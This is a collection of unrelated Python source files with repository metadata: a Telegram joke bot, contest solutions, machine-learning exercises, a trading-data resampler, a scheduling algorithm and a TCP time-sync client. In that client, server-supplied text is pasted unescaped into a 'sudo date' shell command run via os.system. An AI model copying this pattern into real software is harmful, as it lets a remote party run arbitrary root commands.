"""Yo' Mama is so stupid, she thinks DNA is the National Dyslexics Association."""],
'fat': ["""Yo' Mama is so fat, when she goes to a restaurant, instead of a menu, she gets an estimate.""",
""" Yo' Mama is so fat, when the cops see her on a street corner, they yell, "Hey you guys, break it up!" """],
'dumb': ["""Yo' Mama is so dumb, when God was giving out brains, she thought they were milkshakes and asked for extra thick.""",
"""Yo' Mama is so dumb, she locked her keys inside her motorcycle."""]
}
result_message = {'chat_id': message['chat_id']} # the response needs to contain just a chat_id and text field for telegram to accept it
if 'fat' in message['text']:
result_message['text'] = random.choice(jokes['fat'])
elif 'stupid' in message['text']:
result_message['text'] = random.choice(jokes['stupid'])
elif 'dumb' in message['text']:
result_message['text'] = random.choice(jokes['dumb'])
else:
result_message['text'] = "I don't know any responses for that. If you're interested in yo mama jokes tell me fat, stupid or dumb."
result_message['reply_markup'] = InlineKeyboardMarkup([
[
InlineKeyboardButton('Fat', callback_data='fat'),
InlineKeyboardButton('Stupid', callback_data='stupid'),
InlineKeyboardButton('Dumb', callback_data='dumb')
]
]).to_dict()
requests.post(f"https://api.telegram.org/bot{settings.TELEGRAM_TOKEN}/sendMessage",
headers={"Content-Type": "application/json"}, data=json.dumps(result_message))
# Post function to handle messages in whatever format they come
def post(self, request, *args, **kwargs):
data = json.loads(request.body.decode('utf-8'))
# if no button is clicked on telegram app. ie typed a message
if 'message' in data.keys():
# get text message from telegram
text_from_telegram = {'chat_id':data['message']['from']['id'], 'text':data['message']['text']}
# if a button is clicked on telegram app.
else:
text_from_telegram = self.update_callcount_and_get_text(data)
self.send_messages(text_from_telegram)
return HttpResponse()
|
[
"suhailvs@gmail.com"
] |
suhailvs@gmail.com
|
77ca09b513ef3858857f350d2c125052e51fccc2
|
d4abaedd47e5a3ce3e8aa7893cb63faaa4064551
|
/codeforce/round/prob2.py
|
a7ec801c624ce85cb815427de85ab42d2a986f63
|
[] |
no_license
|
shiv125/Competetive_Programming
|
fc1a39be10c0588e0222efab8809b966430fe20f
|
9c949c6d6b5f83a35d6f5f6a169c493f677f4003
|
refs/heads/master
| 2020-03-15T19:47:12.944241
| 2018-05-06T08:18:11
| 2018-05-06T08:18:11
| 132,317,356
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
n,m=map(int,raw_input().split())
poland=[]
eball=[]
for i in range(n):
poland.append(raw_input())
for i in range(m):
eball.append(raw_input())
count=0
for i in poland:
for j in eball:
if i==j:
count+=1
if (n==m):
if (count%2==0):
print "NO"
else:
print "YES"
if (n>m):
print "YES"
if (n<m):
print "NO"
|
[
"shivdutt@shivdutt-Lenovo-G50-80"
] |
shivdutt@shivdutt-Lenovo-G50-80
|
f29162293d3a13e04e0d593b2f83ffadeb585c75
|
3dcfa266c4b7321a4c3a224b98f9ca0dff891e47
|
/archives/weather.py
|
34f3228017b06836750a7051d94df776a005b29f
|
[] |
no_license
|
CandyTt20/Notes
|
a2ef681d123c5219a29334e99aeb900b74bf1834
|
ec092f881122ebdd91ef9764ec7ce4d9cc4723ae
|
refs/heads/master
| 2022-08-21T18:08:33.204223
| 2020-05-19T23:55:49
| 2020-05-19T23:55:49
| 255,209,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
import matplotlib
from matplotlib import pyplot as plt
import random
import io
import sys
# 改变标准输出的默认编码
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8')
# 绘图中设置中文字体显示以及粗细MicroSoft YaHei
font = {'family': 'MicroSoft YaHei',
'weight': 'bold',
'size': '10'}
matplotlib.rc("font", **font)
# 设置画图大小
plt.figure(figsize=(50, 10), dpi=80)
t = [random.randint(20, 35) for i in range(0, 120, 10)]
x = range(0, 120, 10)
# 坐标轴显示字符串
_x = x
_x_tick_1 = ['10点{}分'.format(i) for i in range(10, 60, 10)]
_x_tick_2 = ['11点{}分'.format(i) for i in range(0, 60, 10)]
for i in _x_tick_2:
_x_tick_1.append(i)
_x_tick_1.append('12点0分')
plt.xticks(_x, _x_tick_1, rotation=45) # 字符要和数字一一对应,rotation->旋转字符
# 设置描述信息
plt.xlabel('时间')
plt.ylabel('温度(摄氏度)')
plt.title('温度变化图')
# 画图
plt.plot(x, t)
plt.show()
|
[
"458566293@qq.com"
] |
458566293@qq.com
|
3edf3d407e6ecd51e113a38e8f163fb129b401ad
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/abc059/B/4903797.py
|
b032dc42a02c10e399ae6919bab6161e7ebcff25
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
ab = [int(input()) for i in range(2)]
if (ab[0] > ab[1]):
print("GREATER")
elif (ab[0] < ab[1]):
print("LESS")
else:
print("EQUAL")
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
c343a8e6103ecb162f0314933cee28a37ae3e35c
|
43102360e998f8972e06689f64f39c7cf22479d7
|
/Decision Trees/Applying Decision Trees-92.py
|
59662f44cd14ce508327652d24d4176d49e44b9b
|
[] |
no_license
|
HarshCasper/Dataquest-Tracks
|
8da914101c19442a63ab46732a1cc792c135c3c9
|
9fc87415377824cf2c82d9ed34178ee53509eb67
|
refs/heads/master
| 2020-12-21T21:04:19.015006
| 2020-01-27T18:28:55
| 2020-01-27T18:28:55
| 236,560,422
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,619
|
py
|
## 2. Using Decision Trees With scikit-learn ##
from sklearn.tree import DecisionTreeClassifier
# A list of columns to train with
# We've already converted all columns to numeric
columns = ["age", "workclass", "education_num", "marital_status", "occupation", "relationship", "race", "sex", "hours_per_week", "native_country"]
# Instantiate the classifier
# Set random_state to 1 to make sure the results are consistent
clf = DecisionTreeClassifier(random_state=1)
# We've already loaded the variable "income," which contains all of the income data
clf.fit(income[columns], income["high_income"])
## 3. Splitting the Data into Train and Test Sets ##
import numpy
import math
# Set a random seed so the shuffle is the same every time
numpy.random.seed(1)
# Shuffle the rows
# This permutes the index randomly using numpy.random.permutation
# Then, it reindexes the dataframe with the result
# The net effect is to put the rows into random order
income = income.reindex(numpy.random.permutation(income.index))
train_max_row = math.floor(income.shape[0] * .8)
train = income.iloc[:train_max_row]
test = income.iloc[train_max_row:]
## 4. Evaluating Error With AUC ##
from sklearn.metrics import roc_auc_score
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
error = roc_auc_score(test["high_income"], predictions)
print(error)
## 5. Computing Error on the Training Set ##
predictions = clf.predict(train[columns])
print(roc_auc_score(train["high_income"], predictions))
## 7. Reducing Overfitting With a Shallower Tree ##
# Decision trees model from the last screen
clf = DecisionTreeClassifier(random_state=1)
clf = DecisionTreeClassifier(min_samples_split=13, random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
## 8. Tweaking Parameters to Adjust AUC ##
# The first decision trees model we trained and tested
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
clf = DecisionTreeClassifier(random_state=1, min_samples_split=13, max_depth=7)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
## 9. Tweaking Tree Depth to Adjust AUC ##
# The first decision tree model we trained and tested
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
clf = DecisionTreeClassifier(random_state=1, min_samples_split=100, max_depth=2)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
## 12. Exploring Decision Tree Variance ##
numpy.random.seed(1)
# Generate a column containing random numbers from 0 to 4
income["noise"] = numpy.random.randint(4, size=income.shape[0])
# Adjust "columns" to include the noise column
columns = ["noise", "age", "workclass", "education_num", "marital_status", "occupation", "relationship", "race", "sex", "hours_per_week", "native_country"]
# Make new train and test sets
train_max_row = math.floor(income.shape[0] * .8)
train = income.iloc[:train_max_row]
test = income.iloc[train_max_row:]
# Initialize the classifier
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
|
[
"noreply@github.com"
] |
HarshCasper.noreply@github.com
|
83b38141d2b2a9fe4ace95e23ea76ba72ddbf024
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02753/s018106418.py
|
43f2350835f00370c906db3dceb850869d7371e6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
# A - Station and Bus
# https://atcoder.jp/contests/abc158/tasks/abc158_a
s = input()
if len(set(s)) == 2:
print('Yes')
else:
print('No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
1bf2e6f3d5b517933c42a191a777276597e6abbb
|
58509347cca790fce26884f027425170c5891a17
|
/deep_image_converter/loss/base_loss.py
|
bc1534d557ddf20f3091662c29ed216000fbf416
|
[] |
no_license
|
Hiroshiba/signico_real_to_anime
|
e22d07ca6531b75b3987ecc309e02bcd405f6f61
|
0a68b132fc77e24539d7ddc65b3078fd0c7f3858
|
refs/heads/master
| 2021-01-19T23:25:37.149611
| 2018-03-21T17:24:32
| 2018-03-21T17:32:45
| 88,979,946
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,249
|
py
|
from abc import ABCMeta, abstractmethod
import chainer
from deep_image_converter.config import LossConfig
class BaseLoss(object, metaclass=ABCMeta):
def __init__(self, config: LossConfig, model):
self.config = config
self.model = model
@staticmethod
def blend_loss(loss, blend_config):
assert sorted(loss.keys()) == sorted(blend_config.keys()), '{} {}'.format(loss.keys(), blend_config.keys())
sum_loss = None
for key in sorted(loss.keys()):
blend = blend_config[key]
if blend == 0.0:
continue
l = loss[key] * blend_config[key]
if sum_loss is None:
sum_loss = l
else:
sum_loss += l
return sum_loss
def should_compute(self, key: str):
return key in self.config.blend['main']
def get_loss_names(self):
return ['sum_loss'] + list(self.config.blend['main'].keys())
@abstractmethod
def forward(self, *args, **kwargs):
pass
@abstractmethod
def make_loss(self, outputs, target):
pass
@abstractmethod
def sum_loss(self, loss):
pass
@abstractmethod
def test(self, *args, **kwargs):
pass
|
[
"kazuyuki_hiroshiba@dwango.co.jp"
] |
kazuyuki_hiroshiba@dwango.co.jp
|
bf77468ee650a613d6bf14b965954b3156f6dfcd
|
f70d11f54732808c4ed40886bdd57bbdca6542eb
|
/pyalgotrade/tools/resample.py
|
a8a8ae23b99fed15d20a792c88399406d61cf367
|
[
"Apache-2.0"
] |
permissive
|
stephenagyeman/pyalgotrade
|
1aa4c22b20c707791c5e81ad1bdfb8fb55c8d542
|
a783b8da8c63a1fc25a4bdee560d4c5a6e0c1a8c
|
refs/heads/master
| 2021-01-15T12:03:16.370138
| 2014-01-14T02:15:41
| 2014-01-14T02:15:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,927
|
py
|
# PyAlgoTrade
#
# Copyright 2011-2013 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import os
from pyalgotrade import observer
from pyalgotrade.dataseries import resampled
datetime_format = "%Y-%m-%d %H:%M:%S"
class CSVFileWriter(object):
def __init__(self, csvFile):
self.__file = open(csvFile, "w")
self.__writeLine("Date Time", "Open", "High", "Low", "Close", "Volume", "Adj Close")
def __writeLine(self, *values):
line = ",".join([str(value) for value in values])
self.__file.write(line)
self.__file.write(os.linesep)
def writeSlot(self, slot):
adjClose = slot.getAdjClose()
if adjClose is None:
adjClose = ""
dateTime = slot.getDateTime().strftime(datetime_format)
self.__writeLine(dateTime, slot.getOpen(), slot.getHigh(), slot.getLow(), slot.getClose(), slot.getVolume(), adjClose)
def close(self):
self.__file.close()
class Sampler(object):
def __init__(self, barFeed, frequency, csvFile):
instruments = barFeed.getRegisteredInstruments()
if len(instruments) != 1:
raise Exception("Only barfeeds with 1 instrument can be resampled")
barFeed.getNewBarsEvent().subscribe(self.__onBars)
self.__barFeed = barFeed
self.__frequency = frequency
self.__instrument = instruments[0]
self.__slot = None
self.__writer = CSVFileWriter(csvFile)
def __onBars(self, dateTime, bars):
slotDateTime = resampled.get_slot_datetime(dateTime, self.__frequency)
bar = bars[self.__instrument]
if self.__slot is None:
self.__slot = resampled.Slot(slotDateTime, bar)
elif self.__slot.getDateTime() == slotDateTime:
self.__slot.addBar(bar)
else:
self.__writer.writeSlot(self.__slot)
self.__slot = resampled.Slot(slotDateTime, bar)
def finish(self):
if self.__slot is not None:
self.__writer.writeSlot(self.__slot)
self.__writer.close()
def resample_impl(barFeed, frequency, csvFile):
sampler = Sampler(barFeed, frequency, csvFile)
# Process all bars.
disp = observer.Dispatcher()
disp.addSubject(barFeed)
disp.run()
sampler.finish()
def resample_to_csv(barFeed, frequency, csvFile):
"""Resample a BarFeed into a CSV file grouping bars by a certain frequency.
The resulting file can be loaded using :class:`pyalgotrade.barfeed.csvfeed.GenericBarFeed`.
The CSV file will have the following format:
::
Date Time,Open,High,Low,Close,Volume,Adj Close
2013-01-01 00:00:00,13.51001,13.56,13.51,13.56,273.88014126,13.51001
:param barFeed: The bar feed that will provide the bars. It should only hold bars from a single instrument.
:type barFeed: :class:`pyalgotrade.barfeed.BarFeed`
:param frequency: The grouping frequency in seconds. Must be > 0.
:param csvFile: The path to the CSV file to write.
:type csvFile: string.
.. note::
* Datetimes are stored without timezone information.
* **Adj Close** column may be empty if the input bar feed doesn't have that info.
"""
if frequency > 0:
resample_impl(barFeed, frequency, csvFile)
else:
raise Exception("Invalid frequency")
|
[
"gabo@Gabriels-MacBook.local"
] |
gabo@Gabriels-MacBook.local
|
ac862313a9b98f5a1267b8153262f40789aaf7b9
|
5c900c1801e73aad21a90e97d73e8f10c9f31129
|
/src/02_convert_xlsx_to_rdf.py
|
631659e6768279523bbd07ac609632d3d0d969fd
|
[
"Apache-2.0"
] |
permissive
|
utda/kunshujo
|
024ea7bb1016ba28ae17632ad5e998203bab16fa
|
fbae79171dfd017a47a89bcb18d7862711f0689f
|
refs/heads/master
| 2022-09-11T12:09:23.438408
| 2022-08-31T05:19:52
| 2022-08-31T05:19:52
| 156,177,231
| 0
| 1
|
Apache-2.0
| 2022-08-31T05:20:36
| 2018-11-05T07:27:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,685
|
py
|
import pandas as pd
from rdflib import URIRef, BNode, Literal, Graph
from rdflib.namespace import RDF, RDFS, FOAF, XSD
from rdflib import Namespace
import numpy as np
import math
import sys
import argparse
import json
def parse_args(args=sys.argv[1:]):
""" Get the parsed arguments specified on this script.
"""
parser = argparse.ArgumentParser(description="")
parser.add_argument(
'path',
action='store',
type=str,
help='Ful path.')
return parser.parse_args(args)
args = parse_args()
path = args.path
g = Graph()
df = pd.read_excel(path, sheet_name=0, header=None, index_col=None)
r_count = len(df.index)
c_count = len(df.columns)
map = {}
for i in range(1, c_count):
label = df.iloc[0, i]
uri = df.iloc[1, i]
type = df.iloc[2, i]
if not pd.isnull(type):
obj = {}
map[i] = obj
obj["label"] = label
obj["uri"] = uri
obj["type"] = type
for j in range(3, r_count):
subject = df.iloc[j,0]
subject = URIRef(subject)
for i in map:
value = df.iloc[j,i]
if not pd.isnull(value) and value != 0:
obj = map[i]
p = URIRef(obj["uri"])
if obj["type"].upper() == "RESOURCE":
g.add((subject, p, URIRef(value)))
else:
g.add((subject, p, Literal(value)))
g.serialize(destination=path+'.rdf')
json_path = path+'.json'
f2 = open(json_path, "wb")
f2.write(g.serialize(format='json-ld'))
f2.close()
with open(json_path) as f:
df = json.load(f)
with open(path+"_min.json", 'w') as f:
json.dump(df, f, ensure_ascii=False, sort_keys=True, separators=(',', ': '))
|
[
"na.kamura.1263@gmail.com"
] |
na.kamura.1263@gmail.com
|
c346eb614b07d36c5320bc514531a1b812e3e811
|
600df3590cce1fe49b9a96e9ca5b5242884a2a70
|
/v8/tools/testrunner/local/pool_unittest.py
|
335d20a6bf9a71a8efd476cc4b67aa83e812b801
|
[
"BSD-3-Clause",
"SunPro",
"bzip2-1.0.6"
] |
permissive
|
metux/chromium-suckless
|
efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a
|
72a05af97787001756bae2511b7985e61498c965
|
refs/heads/orig
| 2022-12-04T23:53:58.681218
| 2017-04-30T10:59:06
| 2017-04-30T23:35:58
| 89,884,931
| 5
| 3
|
BSD-3-Clause
| 2022-11-23T20:52:53
| 2017-05-01T00:09:08
| null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from pool import Pool
def Run(x):
  """Worker used by the pool tests: echoes its argument.

  The magic value 10 raises instead, so the tests can verify that
  exceptions inside workers are swallowed by the pool.
  """
  if x != 10:
    return x
  raise Exception("Expected exception triggered by test.")
class PoolTest(unittest.TestCase):
  """Exercises the local test-runner Pool wrapper."""

  def testNormal(self):
    # All ten jobs come back, in arbitrary order.
    seen = set()
    pool = Pool(3)
    for r in pool.imap_unordered(Run, [[n] for n in range(0, 10)]):
      seen.add(r.value)
    self.assertEquals(set(range(0, 10)), seen)

  def testException(self):
    # Job 10 raises inside the worker, so its value never shows up.
    seen = set()
    pool = Pool(3)
    for r in pool.imap_unordered(Run, [[n] for n in range(0, 12)]):
      seen.add(r.value)
    expected = set(range(0, 12))
    expected.remove(10)
    self.assertEquals(expected, seen)

  def testAdd(self):
    # Every result below 30 re-queues itself shifted by 20, yielding the
    # three bands 0-9, 20-29 and 40-49.
    seen = set()
    pool = Pool(3)
    for r in pool.imap_unordered(Run, [[n] for n in range(0, 10)]):
      seen.add(r.value)
      if r.value < 30:
        pool.add([r.value + 20])
    self.assertEquals(set(range(0, 10)) | set(range(20, 30)) | set(range(40, 50)),
                      seen)
|
[
"enrico.weigelt@gr13.net"
] |
enrico.weigelt@gr13.net
|
5a40aaec7aacb3d61f3c59a5a873c57e5c626c01
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02630/s691363854.py
|
db496ce9e82c844b6fd645661f57cc1b9cd4e228
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
from collections import defaultdict

# Competitive-programming task: keep the running sum of the array while
# answering Q "replace every b with c" queries in O(1) each, using a
# value -> multiplicity table instead of rescanning the array.
N = int(input())
A = list(map(int, input().split()))
Q = int(input())

counts = defaultdict(int)
total = 0
for value in A:
    total += value
    counts[value] += 1

for _ in range(Q):
    b, c = map(int, input().split())
    moved = counts[b]
    # replacing `moved` copies of b with c shifts the sum by moved*(c-b)
    total += moved * (c - b)
    print(total)
    counts[b] = 0
    counts[c] += moved
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
fb7272b01c3d2d1856ab5326a9e09a3f548ce4b6
|
757b100c2689f61dbd140672fc10059938bda603
|
/SportsSimulation/sportsSchedule_algo.py
|
9d1b323bee878638324f1f70b3030fefd4325dac
|
[] |
no_license
|
tbkrft567/Portfolio
|
089d8d94d735bbb757eb61688c515f9f25451595
|
bbe514905a734e14c0bda5579928fdc9dad5a69e
|
refs/heads/master
| 2023-03-15T23:02:01.640998
| 2021-02-21T21:32:44
| 2021-02-21T21:32:44
| 231,143,663
| 0
| 0
| null | 2023-03-08T20:27:46
| 2019-12-31T20:31:56
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,531
|
py
|
def generateSchedule(numOfTeams):
    """Build a double round-robin schedule for *numOfTeams* teams.

    Returns a flat list of matches ordered by week; each match is
    [homeTeam, awayTeam, weekNumber] with 1-based team numbers.
    NOTE(review): the pairing arithmetic assumes an even team count -- confirm.
    """
    scheduleGrid = []
    weeklyGrid = []
    for x in range(numOfTeams): # Create a grid for all matches to be played
        scheduleGrid.append([])
        weeklyGrid.append([])
    allMatches = []
    for home in range(1, numOfTeams+1): # Insert all matches to be played
        for away in range(1, numOfTeams+1):
            allMatches.append([home, away])
    # Fill scheduleGrid row by row: row x holds team x+1's home fixtures,
    # with None on the diagonal (a team cannot play itself).
    match = 0
    team = 1
    for x in range(len(scheduleGrid)):
        while match < len(allMatches):
            if allMatches[match][0] != team and scheduleGrid[x][len(scheduleGrid) - 1] != None:
                break
            if allMatches[match][0] != allMatches[match][1]:
                scheduleGrid[x].append(allMatches[match])
                weeklyGrid[x].append([])
            else:
                scheduleGrid[x].append(None)
                weeklyGrid[x].append([])
            match += 1
        team += 1
    matchesToPlay = pow(numOfTeams, 2) - numOfTeams
    matchesPerWeek = int(numOfTeams / 2)
    weeks = int(matchesToPlay / matchesPerWeek)
    # Mark the diagonal cells with None so the week assignment skips them.
    for nullValue in range(numOfTeams):
        weeklyGrid[nullValue][nullValue].append(None)
    x = 0
    # Assign a week number to each fixture: cell (row, col) gets the first
    # week in which neither team is already booked; the mirror fixture
    # (col, row) is scheduled half a season later.
    for weekCount in range(1, int(weeks)+1):
        for row in range(len(weeklyGrid)):
            for col in range(len(weeklyGrid[row])):
                if row == col:
                    continue
                # count how many fixtures each of the two teams already has
                rowTotal = 0
                for tempCol in range(numOfTeams):
                    if len(weeklyGrid[row][tempCol]) != 0 and weeklyGrid[row][tempCol][0] != None:
                        rowTotal += 1
                colTotal = 0
                for tempRow in range(numOfTeams):
                    if len(weeklyGrid[tempRow][col]) != 0 and weeklyGrid[tempRow][col][0] != None:
                        colTotal += 1
                if rowTotal == weekCount:
                    break
                if colTotal == weekCount:
                    continue
                if row > col:
                    continue
                if len(weeklyGrid[row][col]) == 0:
                    weeklyGrid[row][col].append(weekCount)
                    weeklyGrid[col][row].append(
                        int(weekCount + ((pow(numOfTeams, 2) - numOfTeams) / (numOfTeams / 2) / 2)))
                    break
    # Attach the assigned week number as the third element of each match.
    for homeTeam in range(numOfTeams):
        for awayTeam in range(numOfTeams):
            if scheduleGrid[homeTeam][awayTeam] == None:
                continue
            scheduleGrid[homeTeam][awayTeam].append(weeklyGrid[homeTeam][awayTeam][0])
    # Emit matches grouped by week, at most one fixture per team per week.
    leagueSchedule = []
    for weekCount in range(1, weeks+1):
        matchesConfirmed = 0
        for homeTeam in range(numOfTeams): #Row
            for awayTeam in range(numOfTeams): #Col
                if scheduleGrid[homeTeam][awayTeam] != None:
                    if scheduleGrid[homeTeam][awayTeam][2] == weekCount:
                        leagueSchedule.append(scheduleGrid[homeTeam][awayTeam])
                        matchesConfirmed += 1
                        #if scheduleGrid[homeTeam][awayTeam][0] or [1] == homeTeam break awayTeam FOR
                        if scheduleGrid[homeTeam][awayTeam][0] == homeTeam+1 or scheduleGrid[homeTeam][awayTeam][1] == homeTeam+1:
                            break
                if matchesConfirmed == matchesPerWeek:
                    break
            if matchesConfirmed == matchesPerWeek:
                break
    return leagueSchedule
# Demo: build a 16-team double round-robin and print how many matches
# actually made it into the emitted schedule.
numOfTeams = 16
Schedule = generateSchedule(numOfTeams)
print(len(Schedule))
|
[
"tbkrft@gmail.com"
] |
tbkrft@gmail.com
|
4e4eae80ffa5c9109129d78b060c7b96e3479ca3
|
656c384011734403e60a205ffa44bd7a494ebaff
|
/migrations/versions/b509892e3432_.py
|
cb902f6cd5fb52b8c0f7e01248c8f702bfafe762
|
[] |
no_license
|
jreiher2003/Composite
|
cf721737917b3b50f83f7bc8790804f35de82797
|
3547b0ec8568d2212a530b14ccf358acf2e6bec3
|
refs/heads/master
| 2021-01-21T04:47:25.694869
| 2016-07-22T21:38:20
| 2016-07-22T21:38:20
| 53,373,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
"""empty message
Revision ID: b509892e3432
Revises: None
Create Date: 2016-07-21 17:53:01.499715
"""
# revision identifiers, used by Alembic.
revision = 'b509892e3432'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply the migration: create the ``users`` table."""
    # auto-generated by Alembic; adjust if the model changes
    op.create_table(
        'users',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('username', sa.String(), nullable=True),
        sa.Column('password', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('username'),
    )
def downgrade():
    """Revert the migration: drop the ``users`` table."""
    # auto-generated by Alembic
    op.drop_table('users')
|
[
"jreiher2003@yahoo.com"
] |
jreiher2003@yahoo.com
|
68f198e20b5cf9bd2d0f06bd412da9e1b1e528ef
|
568da13e0f0bfc3276508d67b020adea04f3036a
|
/final/170401067/tcpI.py
|
ccf2b2f4734d1f601b25d25fb5169fdd6b13e16d
|
[
"Unlicense"
] |
permissive
|
BaranAkcakaya/blm304
|
75a6be14afb0d9a012d17c56bd1e5ad5abe03630
|
3bca2b2520e673d15c0667418789903b119b9170
|
refs/heads/master
| 2022-10-15T21:04:49.367816
| 2020-06-08T12:34:02
| 2020-06-08T12:34:02
| 267,668,790
| 0
| 0
|
Unlicense
| 2020-06-07T13:36:48
| 2020-05-28T18:42:21
|
Python
|
UTF-8
|
Python
| false
| false
| 889
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 3 22:26:03 2020

@author: EnesNK

TCP time-sync client: connects to the server, echoes its greeting back,
receives a date string plus a timezone, and sets the local clock with
``sudo date --set``.
"""
import socket
import os
# create the client socket
s = socket.socket()
# server address and port to connect to
host = "192.168.1.32"
port = 142
try:
    # start building the clock-set shell command, then connect
    komut = 'sudo date --set="'
    s.connect((host, port))
    # read the server's greeting
    yanit = s.recv(1024)
    print(yanit.decode("utf-8"))
    s.send(yanit) #echo the greeting back to the server
    # next recv is the date string; it completes the shell command below
    komut = komut + s.recv(1024).decode() + '"' #assemble the terminal command
    print(komut)
    zamandilimi = s.recv(1024)  # timezone info, printed only
    print(zamandilimi.decode())
    # NOTE(review): the received text is interpolated into a shell command
    # unescaped -- a malicious server could inject arbitrary commands here.
    os.system(komut) #run the command to set the system clock
    s.close()
except socket.error as msg:
    print("[Server aktif değil.] Mesaj:", msg)
|
[
"noreply@github.com"
] |
BaranAkcakaya.noreply@github.com
|
c0e643ad4fa8ef59d8fc7c410dae20ba6ce83e43
|
6223dc2e5de7921696cb34fb62142fd4a4efe361
|
/.metadata/.plugins/org.eclipse.core.resources/.history/73/60f8cf3a196b00141928c597445b4e35
|
cc1d592056af8a6b636607c3a5fc66693511d529
|
[] |
no_license
|
Mushirahmed/python_workspace
|
5ef477b2688e8c25b1372f546752501ee53d93e5
|
46e2ed783b17450aba29e4e2df7b656522b2b03b
|
refs/heads/master
| 2021-03-12T19:24:50.598982
| 2015-05-25T10:23:54
| 2015-05-25T10:23:54
| 24,671,376
| 0
| 1
| null | 2015-02-06T09:27:40
| 2014-10-01T08:40:33
|
Python
|
UTF-8
|
Python
| false
| false
| 5,406
|
#!/usr/bin/env python
#
# Copyright 2014 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
